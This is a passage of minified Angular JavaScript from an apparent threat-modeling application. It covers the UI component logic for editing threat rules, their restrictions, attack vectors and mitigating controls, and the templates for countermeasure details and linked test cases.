i={Name:this.translate.instant("properties.ComponentRules"),ThreatRules:this.dataService.Config.GetThreatRules().filter(n=>n.RuleType==on.Component&&n.ID!=this.threatRule.ID)};e.push(i)}else{let i=n=>{var r,c;(null===(r=n.ThreatRules)||void 0===r?void 0:r.length)>0&&e.push({Name:n.Name,ThreatRules:n.ThreatRules.filter(d=>d.RuleType==on.DFD&&d.ID!=this.threatRule.ID)}),(null===(c=n.SubGroups)||void 0===c?void 0:c.length)>0&&n.SubGroups.forEach(d=>i(d))};i(this.dataService.Config.DFDThreatRuleGroups)}this.threatRuleGroups[this.threatRule.RuleType]=e}return this.threatRuleGroups[this.threatRule.RuleType]}AddStencilRestriction(){this.threatRule.StencilRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:null}})}RemoveStencilRestriction(e){this.threatRule.StencilRestriction.DetailRestrictions.splice(e,1)}AddComponentRestriction(){this.threatRule.ComponentRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!1}})}RemoveComponentRestriction(e){this.threatRule.ComponentRestriction.DetailRestrictions.splice(e,1)}AddProtocolRestriction(){this.threatRule.ProtocolRestriction.DetailRestrictions.push({IsOR:!0,Layer:0,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:!1}})}RemoveProtocolRestriction(e){this.threatRule.ProtocolRestriction.DetailRestrictions.splice(e,1)}HasPhysicalElement(){return this.selectedStencilType?!Sc.IsPhysical(this.selectedStencilType.ElementTypeID):null}EditAttackVector(){this.dialog.OpenViewAttackVectorDialog(this.threatRule.AttackVector,!0)}AddAttackVector(){let e=this.dataService.Config.CreateAttackVector(null);this.dialog.OpenAddAttackVectorDialog(e).subscribe(i=>{i?(this.threatRule.AttackVector=e,this.threatRule.ThreatCategories=e.ThreatCategories):this.dataService.Config.DeleteAttackVector(e)})}AddDFDNode(e){this.threatRule.DFDRestriction.NodeTypes.splice(e,0,{TypeIDs:[]}),this.propertyGroups={}}RemoveDFDNode(e,i){setTimeout(()=>{i.close()},10),this.threatRule.DFDRestriction.NodeTypes.splice(e,1),this.propertyGroups={}}AddDFDNodeRestriction(){this.threatRule.DFDRestriction.NodeRestrictions.push({Layer:0,NodeNumber:-1,IsOR:!1,RestType:ya.Property,PropertyRest:{ID:"",ComparisonType:cc.Equals,Value:null}})}RemoveDFDNodeRestriction(e){this.threatRule.DFDRestriction.NodeRestrictions.splice(e,1)}GetLayerPadding(e){return(20*e.Layer).toString()+"px"}GetRuleElements(){let e=["Data Flow","Sender"];for(let i=0;i{for(let te=0;teRe.ID==Y);if(pe)return pe}};return this.threatRule.RuleType==on.Stencil?e.RestType==ya.Property?k=T(this.propertyGroups[-2],null===(i=e.PropertyRest)||void 0===i?void 0:i.ID):e.RestType==ya.PhysicalElement&&(k=T(this.phyPropertyGroups[Sc.GetPhyiscalID(this.selectedStencilType.ElementTypeID)],null===(r=null===(n=e.PhyElementRest)||void 0===n?void 0:n.Property)||void 0===r?void 0:r.ID)):this.threatRule.RuleType==on.Component?e.RestType==ya.Property&&(k=T(this.propertyGroups[-2],null===(c=e.PropertyRest)||void 0===c?void 0:c.ID)):e.RestType==ya.Property?k=T(this.propertyGroups[e.NodeNumber],null===(d=e.PropertyRest)||void 0===d?void 0:d.ID):e.RestType==ya.PhysicalElement?k=T(this.phyPropertyGroups[e.NodeNumber],e.PhyElementRest.Property.ID):e.RestType==ya.SenderInterface?k=T(this.interfacePropertyGroups,e.SenderInterfaceRestriction.Property.ID):e.RestType==ya.ReceiverInterface&&(k=T(this.interfacePropertyGroups,e.ReceiverInterfaceRestriction.Property.ID)),null==k?void 0:k.Type}GetAvailablePropertyGroups(e){let i=this.threatRule.RuleType==on.DFD?e.NodeNumber:-2;return null==this.propertyGroups[i]&&(this.propertyGroups[i]=this.GetPropertyGroups(e)),this.propertyGroups[i]}GetPropertyGroups(e){if(this.threatRule.RuleType==on.Stencil){let i=this.selectedStencilType;if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(i)}]}else if(this.threatRule.RuleType==on.Component){let i=this.selectedComponentType;if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:i.Properties}]}if(-1==e.NodeNumber)return[{GroupName:"Data Flow's "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(this.dataService.Config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Et.DataFlow))}];if(0==this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length)return[];if(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length>1){let i=[],n={GroupName:this.translate.instant("pages.config.commonProperties"),Properties:[]};i.push(n);let r=[],c=[];this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.forEach(T=>r.push(this.dataService.Config.GetStencilType(T))),r.forEach(T=>c.push(this.dataService.Config.GetAllStencilProperties(T)));let d={GroupName:r[0].Name+"'s "+this.translate.instant("general.Properties"),Properties:[]};c[0].forEach(T=>{c.every(k=>k.some(q=>q.ID==T.ID))?n.Properties.push(T):d.Properties.push(T)}),i.push(d);for(let T=1;T{n.Properties.some(Y=>Y.ID==q.ID)||k.Properties.push(q)}),i.push(k)}return i=i.filter(T=>T.Properties.length>0),i}{let i=this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]);if(i)return[{GroupName:i.Name+"'s "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(i)}]}return[]}GetDataFlowEntityTypes(){let e=[],i=[Et.LogProcessing,Et.LogDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.PhysicalLink];return i.forEach(n=>{e.push(...this.dataService.Config.GetStencilTypes().filter(r=>r.IsDefault&&r.ElementTypeID==n))}),i.forEach(n=>{e.push(...this.dataService.Config.GetStencilTypes().filter(r=>!r.IsDefault&&r.ElementTypeID==n))}),e}SetPropertyDefaultValue(e,i){e.ID=i.ID,null!=i.DefaultValue&&(e.Value=i.DefaultValue)}CreatePropertyRestrictionType(e,i){let n={ID:"",ComparisonType:cc.Equals,Value:null};i==ya.DataFlowCrosses?e.DataflowRest||(e.DataflowRest={TrustAreaIDs:[]}):i==ya.PhysicalElement?e.PhyElementRest||(e.PhyElementRest={Property:n}):i==ya.Property?e.PropertyRest||(e.PropertyRest=n):i==ya.SenderInterface?e.SenderInterfaceRestriction||(e.SenderInterfaceRestriction={Property:n}):i==ya.ReceiverInterface&&(e.ReceiverInterfaceRestriction||(e.ReceiverInterfaceRestriction={Property:n}))}GetAvailableTrustAreas(){return this.dataService.Config.GetStencilTypes().filter(e=>e.ElementTypeID==Et.LogTrustArea||e.ElementTypeID==Et.PhyTrustArea)}GetAvailablePhyElementPropertyGroups(e){let i=null;if(this.threatRule.RuleType==on.Stencil?i=Sc.GetPhyiscalID(this.selectedStencilType.ElementTypeID):1==this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length&&(i=Sc.GetPhyiscalID(this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]).ElementTypeID)),i){if(null==this.phyPropertyGroups[i]){let n=this.dataService.Config.GetStencilTypes().find(r=>r.IsDefault&&r.ElementTypeID==i);if(n){let r={GroupName:n.Name+"'s "+this.translate.instant("general.Properties"),Properties:n.Properties};this.phyPropertyGroups[i]=[r]}}return this.phyPropertyGroups[i]}return[]}GetAvailableInterfacePropertyGroups(e){return this.interfacePropertyGroups||(this.interfacePropertyGroups=[{GroupName:"Interface's "+this.translate.instant("general.Properties"),Properties:this.dataService.Config.GetAllStencilProperties(this.dataService.Config.GetStencilTypes().find(i=>i.IsDefault&&i.ElementTypeID==Et.Interface))}]),this.interfacePropertyGroups}GetRuleGenerationTypes(){return MG.GetTypes()}GetRuleGenerationTypeName(e){return MG.ToString(e)}GetRestrictionString(){return Fg.ToString(this.threatRule,this.dataService,this.translate)}GetAvailableRestrictionsTypes(e){return this.threatRule.RuleType==on.Stencil?this.HasPhysicalElement()?[ya.Property,ya.PhysicalElement]:[ya.Property]:this.threatRule.RuleType==on.Component?[ya.Property]:-1==e.NodeNumber?[ya.Property,ya.DataFlowCrosses,ya.SenderInterface,ya.ReceiverInterface]:1!=this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs.length||Sc.IsPhysical(this.dataService.Config.GetStencilType(this.threatRule.DFDRestriction.NodeTypes[e.NodeNumber].TypeIDs[0]).ElementTypeID)?[ya.Property]:[ya.Property,ya.PhysicalElement]}GetRestrictionTypeName(e){return class fwe{static GetTypes(){return[ya.Property,ya.DataFlowCrosses,ya.PhysicalElement,ya.SenderInterface,ya.ReceiverInterface]}static GetTypeNames(){let a=[];return Pl.GetTypes().forEach(e=>a.push(Pl.ToString(e))),a}static ToString(a){switch(a){case ya.Property:return"general.Property";case ya.DataFlowCrosses:return"pages.config.threatrule.trustLevelChange";case ya.PhysicalElement:return"properties.PhysicalElement";case ya.SenderInterface:return"properties.SenderInterface";case ya.ReceiverInterface:return"properties.ReceiverInterface";default:return console.error("Missing Restriction Type in RestrictionTypes.ToString()"),"Undefined"}}}.ToString(e)}GetControls(){return this.dataService.Config.GetControls().filter(e=>e.MitigatedThreatRules.includes(this.threatRule))}GetVectorControls(){return this.threatRule.AttackVector?this.dataService.Config.GetControls().filter(e=>e.MitigatedAttackVectors.includes(this.threatRule.AttackVector)):null}GetPossibleControls(){let e=this.dataService.Config.GetControls().filter(i=>!i.MitigatedThreatRules.includes(this.threatRule));return this.threatRule.AttackVector&&(e=e.filter(i=>!i.MitigatedAttackVectors.includes(this.threatRule.AttackVector))),e}AddExistingControl(e){e.AddMitigatedThreatRule(this.threatRule)}AddControl(){let e=this.dataService.Config.CreateControl(this.dataService.Config.ControlLibrary);e.AddMitigatedThreatRule(this.threatRule),this.selectedControl=e}RemoveControl(e){e.RemoveMitigatedThreatRule(this.threatRule),e==this.selectedControl&&(this.selectedControl=null)}DeleteControl(e){this.dataService.Config.DeleteControl(e),e==this.selectedControl&&(this.selectedControl=null)}dropControl(e,i){const n=this.dataService.Config.GetControls().indexOf(i[e.previousIndex]),r=this.dataService.Config.GetControls().indexOf(i[e.currentIndex]);Qs(this.dataService.Config.GetControls(),n,r)}GetSeverityTypes(){return vn.GetTypes()}GetSeverityTypeName(e){return vn.ToString(e)}SetLWH(e,i){e.Value=Number(i)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}GetIcon(e){return Sc.Icon(e.ElementTypeID)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Fp,8),Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-rule"]],inputs:{node:"node",threatRule:"threatRule",canEdit:"canEdit",canEditName:"canEditName",showAttackVector:"showAttackVector"},decls:1,vars:1,consts:[["style","margin-left: 10px; margin-top: 10px;",3,"disable",4,"ngIf"],[2,"margin-left","10px","margin-top","10px"],["color","primary",2,"margin-bottom","10px",3,"ngModel","ngModelChange"],["appearance","fill","class","property-form-field",4,"ngIf"],["appearance","fill",1,"property-form-field"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange","selectionChange"],[3,"label",4,"ngFor","ngForOf"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"disabled","matTooltip","click"],["mat-icon-button","","matSuffix","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["appearance","fill",2,"width","150px","margin-left","10px"],[3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["class","expansion-panel-headers-align","style","pointer-events: initial;",4,"ngIf"],["appearance","fill",2,"width","100%"],["multiple","",3,"value","valueChange"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[4,"ngIf"],[1,"row",2,"margin-top","10px"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matMenuTriggerFor","matTooltip"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existing","matMenu"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px;",4,"ngIf"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"label"],[3,"value"],[1,"expansion-panel-headers-align",2,"pointer-events","initial"],[2,"margin-bottom","20px"],["matExpansionPanelContent",""],[3,"canEdit","attackVector"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],["appearance","fill",1,"property-form-field","disable"],["matInput","","matTooltipShowDelay","1000",3,"spellcheck","value","matTooltip"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-left","10px"],[4,"ngFor","ngForOf"],["matPrefix","","matInput","","min","0","type","number",2,"width","30px",3,"ngModel","ngModelChange"],[3,"value","click",4,"ngFor","ngForOf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",2,"width","25px",3,"matTooltip","click"],["mat-raised-button","","style","margin-left: 10px; vertical-align: super;",3,"click",4,"ngIf"],[3,"value","click"],["appearance","fill",1,"property-form-field",2,"margin-left","10px"],["mat-raised-button","",2,"margin-left","10px","vertical-align","super",3,"click"],["color","primary",2,"margin-left","10px","vertical-align","super",3,"ngModel","ngModelChange"],[2,"width","75px","margin-left","10px","vertical-align","super",3,"ngModel","change"],["mat-icon-button","","matTooltipShowDelay","1000",2,"vertical-align","super",3,"matTooltip","click"],[1,"btn-icon"],["typeSelect",""],["matSuffix","","mat-icon-button","","style","width: 25px;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["mat-icon-button","","style","vertical-align: super;","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill","class","property-form-field","style","margin-left: 10px;",4,"ngIf"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto","margin-right","0px",3,"matTooltip","click"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],[3,"control","canEdit","canEditName","canEditGroup"]],template:function(e,i){1&e&&ne(0,i5e,151,77,"div",0),2&e&&F("ngIf",i.threatRule)},styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}.property-form-field[_ngcontent-%COMP%]{width:300px}.restrictions-column1[_ngcontent-%COMP%]{float:left;width:300px}.restrictions-column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 310px)}.btn-icon[_ngcontent-%COMP%]{opacity:.5}.btn-icon[_ngcontent-%COMP%]:hover{opacity:1}.btn-selected-light[_ngcontent-%COMP%]{opacity:1;background-color:#00000026;border-radius:5px}.btn-selected-dark[_ngcontent-%COMP%]{opacity:1;background-color:#ffffff26;border-radius:5px}']}),t})();const a5e=["nameBox"],n5e=["searchTCBox"];function o5e(t,a){if(1&t){const e=Ye();m(0,"button",30),he("click",function(){return be(e),Me(V(2).countermeasure.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function r5e(t,a){1&t&&(m(0,"mat-hint",31),s(1),oe(2,"translate"),u()),2&t&&(g(1),ct("\n ",re(2,1,"messages.error.numberAlreadyExists"),"\n "))}function s5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(2);F("value",e),g(1),ke(re(2,2,i.GetMitigationStateName(e)))}}function c5e(t,a){1&t&&(m(0,"mat-icon",33),oe(1,"translate"),s(2,"sync_problem"),u()),2&t&&at("matTooltip",re(1,1,"pages.modeling.countermeasure.ruleNotApplyingAnymore"))}function l5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e.Name)}}function d5e(t,a){if(1&t&&(m(0,"mat-form-field",34),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),it(6,"input",35),s(7,"\n "),u()),2&t){const e=V(2);g(3),ct("",re(4,2,"general.Targets"),"*"),g(3),F("value",e.GetTargetsNames())}}function m5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.GetProperty("Name"),"\n ")}}function u5e(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",36),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",37),he("valueChange",function(n){return be(e),Me(V(2).countermeasure.Targets=n)}),s(7,"\n "),m(8,"mat-option"),s(9),oe(10,"translate"),u(),s(11,"\n "),ne(12,m5e,2,2,"mat-option",10),s(13,"\n "),u(),s(14,"\n "),u()}if(2&t){const e=V(2);g(3),ct("",re(4,5,"general.Targets"),"*"),g(3),at("matTooltip",e.GetTargetsNames()),F("value",e.countermeasure.Targets),g(3),ke(re(10,7,"properties.selectNone")),g(3),F("ngForOf",e.elements)}}function h5e(t,a){if(1&t&&(m(0,"mat-option",32),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function f5e(t,a){if(1&t&&(m(0,"mat-optgroup",38),s(1,"\n "),ne(2,h5e,2,2,"mat-option",10),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.name),g(2),F("ngForOf",e.Controls)}}function p5e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-control",40),s(2,"\n ")),2&t){const e=V(3);g(1),F("canEdit",!1)("control",e.countermeasure.Control)}}function _5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,p5e,3,2,"ng-template",39),s(16,"\n "),u()),2&t){const e=V(2);g(5),ct("\n ",re(6,2,"general.ControlInfo"),"\n "),g(4),ct("\n ",e.countermeasure.Control.Name,"\n ")}}function g5e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-mitigation-process",41),s(2,"\n ")),2&t){const e=V(3);g(1),F("canEdit",!1)("mitigationProcess",e.countermeasure.MitigationProcess)}}function C5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,g5e,3,2,"ng-template",39),s(16,"\n "),u()),2&t){const e=V(2);g(5),ct("\n ",re(6,2,"general.MitigationProcessInfo"),"\n "),g(4),ct("\n ",e.countermeasure.MitigationProcess.Name,"\n ")}}function y5e(t,a){if(1&t&&(s(0,"\n "),it(1,"app-attack-scenario",42),s(2,"\n ")),2&t){const e=V().$implicit;g(1),F("canEdit",!1)("attackScenario",e)}}function b5e(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,y5e,3,2,"ng-template",39),s(16,"\n "),u()),2&t){const e=a.$implicit;g(5),ct("\n ",re(6,2,"pages.modeling.countermeasure.mitigatedThreats"),"\n "),g(4),ct("\n ",null==e?null:e.GetProperty("Name"),"\n ")}}function M5e(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function v5e(t,a){if(1&t){const e=Ye();m(0,"button",56),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnLinkTestCase(r))}),s(1),u()}if(2&t){const e=a.$implicit;at("matTooltip",e.Name),g(1),ke(e.Name)}}function A5e(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",57),he("click",function(){const r=be(e).$implicit;return Me(V(3).selectedTestCase=r)}),s(1,"\n "),m(2,"mat-icon",58),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",59),s(6),u(),s(7,"\n "),m(8,"button",60),he("click",function(){const r=be(e).$implicit;return Me(V(3).OnUnlinkTestCase(r))}),oe(9,"translate"),m(10,"mat-icon"),s(11,"remove"),u()(),s(12,"\n "),u()}if(2&t){const e=a.$implicit,i=V(3);Ct("highlight-light",i.selectedTestCase===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedTestCase===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(e.Name),g(2),at("matTooltip",re(9,7,"general.Remove"))}}function T5e(t,a){if(1&t&&(m(0,"div",61),s(1,"\n "),it(2,"app-test-case",62),s(3,"\n "),u()),2&t){const e=V(3);g(2),F("testCase",e.selectedTestCase)}}function E5e(t,a){if(1&t){const e=Ye();m(0,"div",43),s(1,"\n "),m(2,"div",44),s(3,"\n "),m(4,"mat-list",45),s(5,"\n "),m(6,"div",46),s(7),oe(8,"translate"),m(9,"button",47),oe(10,"translate"),m(11,"mat-icon"),s(12,"add"),u()(),s(13,"\n "),m(14,"mat-menu",null,48),s(16,"\n "),m(17,"input",49,50),he("ngModelChange",function(n){return be(e),Me(V(2).searchTCString=n)})("click",function(){return be(e),Me(V(2).OnSearchTCBoxClick())}),oe(19,"translate"),u(),s(20,"\n "),ne(21,M5e,2,2,"button",51),s(22,"\n "),u(),s(23,"\n "),m(24,"mat-menu",null,52),s(26,"\n "),ne(27,v5e,2,2,"button",51),s(28,"\n "),u(),s(29,"\n "),u(),s(30,"\n "),ne(31,A5e,13,9,"mat-list-item",53),s(32,"\n "),u(),s(33,"\n "),u(),s(34,"\n "),m(35,"div",54),s(36,"\n "),ne(37,T5e,4,1,"div",55),s(38,"\n "),u(),s(39,"\n "),u()}if(2&t){const e=Ti(15),i=Ti(25),n=V(2);g(4),Ct("prop-list-light",!n.theme.IsDarkMode)("prop-list-dark",n.theme.IsDarkMode),g(3),ct("",re(8,14,"properties.LinkedTestCases")," \n "),g(2),at("matTooltip",re(10,16,"general.Add")),F("matMenuTriggerFor",e),g(8),at("placeholder",re(19,18,"general.Search")),F("ngModel",n.searchTCString)("matMenuTriggerFor",i),g(4),F("ngForOf",n.GetTestCases()),g(6),F("ngForOf",n.GetFilteredTestCases()),g(4),F("ngForOf",n.countermeasure.GetTestCases()),g(6),F("ngIf",n.selectedTestCase)}}function D5e(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),m(2,"mat-form-field",1),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",2,3),he("ngModelChange",function(n){return be(e),Me(V().countermeasure.Name=n)}),u(),s(10,"\n "),ne(11,o5e,6,3,"button",4),s(12,"\n "),u(),s(13,"\n "),m(14,"mat-form-field",5),s(15,"\n "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n "),m(20,"input",6),he("ngModelChange",function(n){return be(e),Me(V().countermeasure.Number=n)}),u(),s(21,"\n "),ne(22,r5e,3,3,"mat-hint",7),s(23,"\n "),u(),s(24,"\n "),it(25,"br"),s(26,"\n "),m(27,"mat-form-field",8),s(28,"\n "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n "),m(33,"mat-select",9),he("valueChange",function(n){return be(e),Me(V().countermeasure.MitigationState=n)}),oe(34,"translate"),s(35,"\n "),ne(36,s5e,3,4,"mat-option",10),s(37,"\n "),u(),s(38,"\n "),u(),s(39,"\n "),ne(40,c5e,3,3,"mat-icon",11),s(41,"\n "),m(42,"mat-form-field",12),s(43,"\n "),m(44,"mat-label"),s(45),oe(46,"translate"),u(),s(47,"\n "),m(48,"mat-select",13),he("valueChange",function(n){return be(e),Me(V().countermeasure.MitigationProcess=n)})("selectionChange",function(){return be(e),Me(V().mitigationProcessChange.emit())}),s(49,"\n "),m(50,"input",14),he("keyup",function(n){return be(e),Me(V().OnSearchMitigationProcess(n))}),oe(51,"translate"),u(),s(52,"\n "),m(53,"mat-option"),s(54),oe(55,"translate"),u(),s(56,"\n "),ne(57,l5e,2,2,"mat-option",10),s(58,"\n "),u(),s(59,"\n "),m(60,"button",15),he("click",function(n){return be(e),V().EditMitigationProcess(),Me(n.stopPropagation())}),oe(61,"translate"),s(62,"\n "),m(63,"mat-icon"),s(64,"edit"),u(),s(65,"\n "),u(),s(66,"\n "),m(67,"button",16),he("click",function(n){return be(e),V().AddMitigationProcess(),Me(n.stopPropagation())}),oe(68,"translate"),s(69,"\n "),m(70,"mat-icon"),s(71,"add"),u(),s(72,"\n "),u(),s(73,"\n "),u(),s(74,"\n "),it(75,"br"),s(76,"\n "),ne(77,d5e,8,4,"mat-form-field",17),s(78,"\n "),ne(79,u5e,15,9,"mat-form-field",18),s(80,"\n "),m(81,"mat-form-field",19),s(82,"\n "),m(83,"mat-label"),s(84),oe(85,"translate"),u(),s(86,"\n "),it(87,"input",20),s(88,"\n "),u(),s(89,"\n "),it(90,"br"),s(91,"\n "),m(92,"mat-form-field",8),s(93,"\n "),m(94,"mat-label"),s(95),oe(96,"translate"),oe(97,"translate"),u(),s(98,"\n "),m(99,"mat-select",21),he("valueChange",function(n){return be(e),Me(V().countermeasure.Control=n)}),s(100,"\n "),m(101,"input",14),he("keyup",function(n){return be(e),Me(V().OnSearchControls(n))}),oe(102,"translate"),u(),s(103,"\n "),m(104,"mat-option"),s(105),oe(106,"translate"),u(),s(107,"\n "),ne(108,f5e,4,2,"mat-optgroup",22),s(109,"\n "),u(),s(110,"\n "),m(111,"button",16),he("click",function(n){return be(e),V().AddControl(),Me(n.stopPropagation())}),oe(112,"translate"),s(113,"\n "),m(114,"mat-icon"),s(115,"add"),u(),s(116,"\n "),u(),s(117,"\n "),u(),s(118,"\n "),m(119,"mat-form-field",23),s(120,"\n "),m(121,"mat-label"),s(122),oe(123,"translate"),u(),s(124,"\n "),m(125,"textarea",24),he("ngModelChange",function(n){return be(e),Me(V().countermeasure.Description=n)}),u(),s(126,"\n "),u(),s(127,"\n "),it(128,"app-tags",25),s(129,"\n "),m(130,"mat-accordion",26),s(131,"\n "),ne(132,_5e,17,4,"mat-expansion-panel",27),s(133,"\n "),ne(134,C5e,17,4,"mat-expansion-panel",27),s(135,"\n "),ne(136,b5e,17,4,"mat-expansion-panel",28),s(137,"\n "),u(),s(138,"\n "),it(139,"br"),s(140,"\n "),ne(141,E5e,40,20,"div",29),s(142,"\n"),u()}if(2&t){const e=V();let 